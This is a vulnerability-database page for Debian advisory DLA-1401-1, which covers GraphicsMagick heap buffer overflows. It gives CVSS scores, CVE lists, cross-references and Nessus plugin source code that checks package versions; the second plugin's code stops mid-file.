DATABASE RESOURCES PRICING ABOUT US

{"id": "OSV:DLA-1401-1", "vendorId": null, "type": "osv", "bulletinFamily": "software", "title": "graphicsmagick - security update", "description": "\nVarious security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n1.3.20-3+deb8u3.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "published": "2018-06-27T00:00:00", "modified": "2022-07-21T05:52:09", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://osv.dev/vulnerability/DLA-1401-1", "reporter": "Google", "references": ["https://www.debian.org/lts/security/2018/dla-1401"], "cvelist": ["CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5241", "CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-14314", "CVE-2017-14733", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "immutableFields": [], "lastseen": "2022-07-21T08:19:25", "viewCount": 0, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "altlinux", "idList": ["682061AC284886CF3E2D521ABCE02271"]}, {"type": "amazon", "idList": ["ALAS-2016-699", "ALAS-2016-717", "ALAS-2016-752", "ALAS-2018-966"]}, {"type": "archlinux", "idList": ["ASA-201801-7"]}, {"type": "attackerkb", "idList": ["AKB:7C1FB725-BB89-40DA-A795-3EE67161A949"]}, {"type": "centos", "idList": ["CESA-2016:0726"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0539", "CPAI-2016-0540", "CPAI-2016-0541"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:129B6A9BB5C74D717E5AB861B666605D", "CFOUNDRY:C94493DDE348FDF28E8866771E34ED7C"]}, {"type": "cve", "idList": ["CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5241", "CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-14314", "CVE-2017-14733", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1045-1:24D9D", "DEBIAN:DLA-1045-1:712EB", "DEBIAN:DLA-1081-1:D21F2", "DEBIAN:DLA-1082-1:FA56E", "DEBIAN:DLA-1154-1:6E465", "DEBIAN:DLA-1159-1:9BBB4", "DEBIAN:DLA-1159-1:CC197", "DEBIAN:DLA-1168-1:C7018", "DEBIAN:DLA-1170-1:0834A", "DEBIAN:DLA-1231-1:8E55F", "DEBIAN:DLA-1231-1:C59AA", "DEBIAN:DLA-1401-1:300F8", "DEBIAN:DLA-1401-1:A41C0", "DEBIAN:DLA-484-1:5CC12", "DEBIAN:DLA-486-1:42FF7", "DEBIAN:DLA-574-1:C1988", "DEBIAN:DLA-651-1:36F8B", "DEBIAN:DLA-683-1:B3C9A", "DEBIAN:DSA-3580-1:5A0E9", "DEBIAN:DSA-3580-1:70B04", "DEBIAN:DSA-4032-1:08B80", "DEBIAN:DSA-4040-1:E6366", "DEBIAN:DSA-4321-1:D5514"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-3716", "DEBIANCVE:CVE-2016-3717", "DEBIANCVE:CVE-2016-3718", "DEBIANCVE:CVE-2016-5241", "DEBIANCVE:CVE-2016-7446", "DEBIANCVE:CVE-2016-7447", "DEBIANCVE:CVE-2016-7448", "DEBIANCVE:CVE-2016-7449", "DEBIANCVE:CVE-2017-11636", "DEBIANCVE:CVE-2017-11643", "DEBIANCVE:CVE-2017-12937", "DEBIANCVE:CVE-2017-13063", "DEBIANCVE:CVE-2017-13064", "DEBIANCVE:CVE-2017-13065", "DEBIANCVE:CVE-2017-13134", "DEBIANCVE:CVE-2017-14314", "DEBIANCVE:CVE-2017-14733", "DEBIANCVE:CVE-2017-16353", "DEBIANCVE:CVE-2017-16669", "DEBIANCVE:CVE-2017-17498", "DEBIANCVE:CVE-2017-17500", "DEBIANCVE:CVE-2017-17501", "DEBIANCVE:CVE-2017-17502", "DEBIANCVE:CVE-2017-17503", "DEBIANCVE:CVE-2017-17782", "DEBIANCVE:CVE-2017-17912", "DEBIANCVE:CVE-2017-17915"]}, {"type": "exploitdb", "idList": ["EDB-ID:39767"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E547A33BCC88CE840B8FDF179CDA0103"]}, {"type": "f5", "idList": ["F5:K03151140", "F5:K10550253", "F5:K25102203", "F5:K29154575", "F5:K61974123", "SOL03151140", "SOL10550253", "SOL25102203", "SOL29154575", "SOL61974123"]}, {"type": "fedora", "idList": ["FEDORA:408C160062DD", "FEDORA:70C3C60CA240", "FEDORA:7E5CE60E6280", "FEDORA:8CDCB60874CB", "FEDORA:C16F56079703", "FEDORA:C7F6A6178920", "FEDORA:DFB316077DF1"]}, {"type": "freebsd", "idList": ["0D724B05-687F-4527-9C03-AF34D3B094EC"]}, {"type": "gentoo", "idList": ["GLSA-201611-21", "GLSA-201711-07"]}, {"type": "mageia", "idList": ["MGASA-2016-0188", "MGASA-2016-0252", "MGASA-2016-0325", "MGASA-2017-0297", "MGASA-2018-0229"]}, {"type": "nessus", "idList": ["9387.PRM", "ALA_ALAS-2016-699.NASL", "ALA_ALAS-2016-717.NASL", "ALA_ALAS-2016-752.NASL", "ALA_ALAS-2018-966.NASL", "CENTOS_RHSA-2016-0726.NASL", "DEBIAN_DLA-1045.NASL", "DEBIAN_DLA-1081.NASL", "DEBIAN_DLA-1082.NASL", "DEBIAN_DLA-1154.NASL", "DEBIAN_DLA-1159.NASL", "DEBIAN_DLA-1168.NASL", "DEBIAN_DLA-1170.NASL", "DEBIAN_DLA-1231.NASL", "DEBIAN_DLA-1401.NASL", "DEBIAN_DLA-484.NASL", "DEBIAN_DLA-486.NASL", "DEBIAN_DLA-651.NASL", "DEBIAN_DLA-683.NASL", "DEBIAN_DSA-3580.NASL", "DEBIAN_DSA-4032.NASL", "DEBIAN_DSA-4040.NASL", "DEBIAN_DSA-4321.NASL", "EULEROS_SA-2016-1021.NASL", "F5_BIGIP_SOL25102203.NASL", "F5_BIGIP_SOL29154575.NASL", "F5_BIGIP_SOL61974123.NASL", "FEDORA_2016-0BDF82500F.NASL", "FEDORA_2016-0D90EAD5D7.NASL", "FEDORA_2016-390EC4A8F3.NASL", "FEDORA_2016-40CCAFF4D1.NASL", "FEDORA_2016-7A878ED298.NASL", "FEDORA_2016-F7195D5E5A.NASL", "FEDORA_2018-7C61D08C4F.NASL", "FEDORA_2018-BFB9835EDD.NASL", "FEDORA_2019-425A1AA7C9.NASL", "FEDORA_2019-DA4C20882C.NASL", "FREEBSD_PKG_0D724B05687F45279C03AF34D3B094EC.NASL", "GENTOO_GLSA-201611-21.NASL", "GENTOO_GLSA-201711-07.NASL", "IMAGEMAGICK_7_0_1_1.NASL", "OPENSUSE-2016-1229.NASL", "OPENSUSE-2016-1230.NASL", "OPENSUSE-2016-569.NASL", "OPENSUSE-2016-574.NASL", "OPENSUSE-2016-602.NASL", "OPENSUSE-2016-825.NASL", "OPENSUSE-2016-984.NASL", "OPENSUSE-2017-1199.NASL", "OPENSUSE-2017-1276.NASL", "OPENSUSE-2017-1346.NASL", "OPENSUSE-2017-1362.NASL", "OPENSUSE-2017-1386.NASL", "OPENSUSE-2017-1413.NASL", "OPENSUSE-2017-966.NASL", "OPENSUSE-2018-122.NASL", "OPENSUSE-2018-166.NASL", "OPENSUSE-2018-191.NASL", "OPENSUSE-2018-213.NASL", "OPENSUSE-2018-283.NASL", "OPENSUSE-2018-343.NASL", "ORACLELINUX_ELSA-2016-0726.NASL", "REDHAT-RHSA-2016-0726.NASL", "SLACKWARE_SSA_2016-132-01.NASL", "SL_20160509_IMAGEMAGICK_ON_SL6_X.NASL", "SUSE_SU-2016-1260-1.NASL", "SUSE_SU-2016-1275-1.NASL", "SUSE_SU-2017-3378-1.NASL", "SUSE_SU-2017-3388-1.NASL", "SUSE_SU-2018-0857-1.NASL", "SUSE_SU-2018-0880-1.NASL", "UBUNTU_USN-2990-1.NASL", "UBUNTU_USN-3681-1.NASL", "UBUNTU_USN-4206-1.NASL", "UBUNTU_USN-4222-1.NASL", "UBUNTU_USN-4232-1.NASL", "UBUNTU_USN-4248-1.NASL", "UBUNTU_USN-4266-1.NASL", "WORDPRESS_4_5_2.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112027", "OPENVAS:1361412562310120688", "OPENVAS:1361412562310120706", "OPENVAS:1361412562310120741", "OPENVAS:1361412562310703580", "OPENVAS:1361412562310704032", "OPENVAS:1361412562310704040", "OPENVAS:1361412562310704321", "OPENVAS:1361412562310807568", "OPENVAS:1361412562310808248", "OPENVAS:1361412562310808446", "OPENVAS:1361412562310808468", "OPENVAS:1361412562310808470", "OPENVAS:1361412562310810560", "OPENVAS:1361412562310842781", "OPENVAS:1361412562310843556", "OPENVAS:1361412562310844255", "OPENVAS:1361412562310844278", "OPENVAS:1361412562310844287", "OPENVAS:1361412562310844305", "OPENVAS:1361412562310844326", "OPENVAS:1361412562310851304", "OPENVAS:1361412562310851305", "OPENVAS:1361412562310851307", "OPENVAS:1361412562310851317", "OPENVAS:1361412562310851361", "OPENVAS:1361412562310851385", "OPENVAS:1361412562310851657", "OPENVAS:1361412562310851663", "OPENVAS:1361412562310851668", "OPENVAS:1361412562310871609", "OPENVAS:1361412562310874084", "OPENVAS:1361412562310874085", "OPENVAS:1361412562310876545", "OPENVAS:1361412562310876546", "OPENVAS:1361412562310882483", "OPENVAS:1361412562310882484", "OPENVAS:1361412562310891045", "OPENVAS:1361412562310891081", "OPENVAS:1361412562310891082", "OPENVAS:1361412562310891231", "OPENVAS:1361412562310891401", "OPENVAS:1361412562311220161021", "OPENVAS:703580"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0726", "ELSA-2016-1237"]}, {"type": "osv", "idList": ["OSV:DLA-1045-1", "OSV:DLA-1081-1", "OSV:DLA-1082-1", "OSV:DLA-1130-1", "OSV:DLA-1154-1", "OSV:DLA-1159-1", "OSV:DLA-1168-1", "OSV:DLA-1170-1", "OSV:DLA-1231-1", "OSV:DLA-484-1", "OSV:DLA-486-1", "OSV:DLA-547-1", "OSV:DLA-547-2", "OSV:DLA-651-1", "OSV:DLA-683-1", "OSV:DSA-3580-1", "OSV:DSA-4032-1", "OSV:DSA-4040-1", "OSV:DSA-4321-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144878"]}, {"type": "redhat", "idList": ["RHSA-2016:0726"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-3716", "RH:CVE-2016-3717", "RH:CVE-2016-3718", "RH:CVE-2017-13134", "RH:CVE-2017-16353"]}, {"type": "seebug", "idList": ["SSV:91446"]}, {"type": "slackware", "idList": ["SSA-2016-132-01", "SSA-2016-132-01-IMAGEMAGICK"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1261-1", "OPENSUSE-SU-2016:1266-1", "OPENSUSE-SU-2016:1326-1", "OPENSUSE-SU-2016:1724-1", "OPENSUSE-SU-2016:2073-1", "OPENSUSE-SU-2017:3223-1", "OPENSUSE-SU-2017:3270-1", "OPENSUSE-SU-2017:3420-1", "SUSE-SU-2016:1260-1", "SUSE-SU-2016:1275-1", "SUSE-SU-2016:1783-1", "SUSE-SU-2017:2229-1", "SUSE-SU-2017:3378-1", "SUSE-SU-2017:3388-1", "SUSE-SU-2017:3435-1"]}, {"type": "ubuntu", "idList": ["USN-2990-1", "USN-3681-1", "USN-4206-1", "USN-4222-1", "USN-4232-1", "USN-4248-1", "USN-4266-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-3716", "UB:CVE-2016-3717", "UB:CVE-2016-3718", "UB:CVE-2016-5241", "UB:CVE-2016-7446", "UB:CVE-2016-7447", "UB:CVE-2016-7448", "UB:CVE-2016-7449", "UB:CVE-2017-11636", "UB:CVE-2017-11643", "UB:CVE-2017-12937", "UB:CVE-2017-13063", "UB:CVE-2017-13064", "UB:CVE-2017-13065", "UB:CVE-2017-13134", "UB:CVE-2017-14314", "UB:CVE-2017-14733", "UB:CVE-2017-16353", "UB:CVE-2017-16669", "UB:CVE-2017-17498", "UB:CVE-2017-17500", "UB:CVE-2017-17501", "UB:CVE-2017-17502", "UB:CVE-2017-17503", "UB:CVE-2017-17782", "UB:CVE-2017-17912", "UB:CVE-2017-17915"]}, {"type": "veracode", "idList": ["VERACODE:26804", "VERACODE:26817", "VERACODE:26824", "VERACODE:26838", "VERACODE:26849", "VERACODE:26856", "VERACODE:26859", "VERACODE:26917", "VERACODE:26920", "VERACODE:26975", "VERACODE:27023", "VERACODE:27029", "VERACODE:27054", "VERACODE:27074", "VERACODE:27129", "VERACODE:27159", "VERACODE:27168"]}, {"type": "zdt", "idList": ["1337DAY-ID-25991", "1337DAY-ID-28948"]}]}, "vulnersScore": 0.9}, "_state": {"dependencies": 1659998956, "score": 1659987969}, "_internal": {"score_hash": "a7a7ebee0c2017314ce3f975b9be78f3"}, "affectedSoftware": [{"version": "1.3.20-3+deb8u1", "operator": "eq", "name": "graphicsmagick"}, {"version": "1.3.20-3+deb8u2", "operator": "eq", "name": "graphicsmagick"}]}

{"nessus": [{"lastseen": "2022-03-27T15:43:43", "description": "Various security issues were discovered in Graphicsmagick, a collection of image processing tools. Heap-based buffer overflows or overreads may lead to a denial of service or disclosure of in-memory information or other unspecified impact by processing a malformed image file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-28T00:00:00", "type": "nessus", "title": "Debian DLA-1401-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5241", "CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-14314", "CVE-2017-14733", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1401.NASL", "href": "https://www.tenable.com/plugins/nessus/110727", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1401-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110727);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\", \"CVE-2016-5241\", \"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\", \"CVE-2017-11636\", \"CVE-2017-11643\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-14314\", \"CVE-2017-14733\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17912\", \"CVE-2017-17915\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-1401-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various security issues were discovered in Graphicsmagick, a\ncollection of image processing tools. Heap-based buffer overflows or\noverreads may lead to a denial of service or disclosure of in-memory\ninformation or other unspecified impact by processing a malformed\nimage file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.20-3+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:34:18", "description": "The NSFocus Security Team discovered multiple security issues in Graphicsmagick, a collection of image processing tools. Several heap-based buffer over-reads may lead to a denial of service (application crash) or possibly have other unspecified impact when processing a crafted file.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-09T00:00:00", "type": "nessus", "title": "Debian DLA-1231-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1231.NASL", "href": "https://www.tenable.com/plugins/nessus/105659", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1231-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105659);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17912\", \"CVE-2017-17915\");\n\n script_name(english:\"Debian DLA-1231-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial of service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n 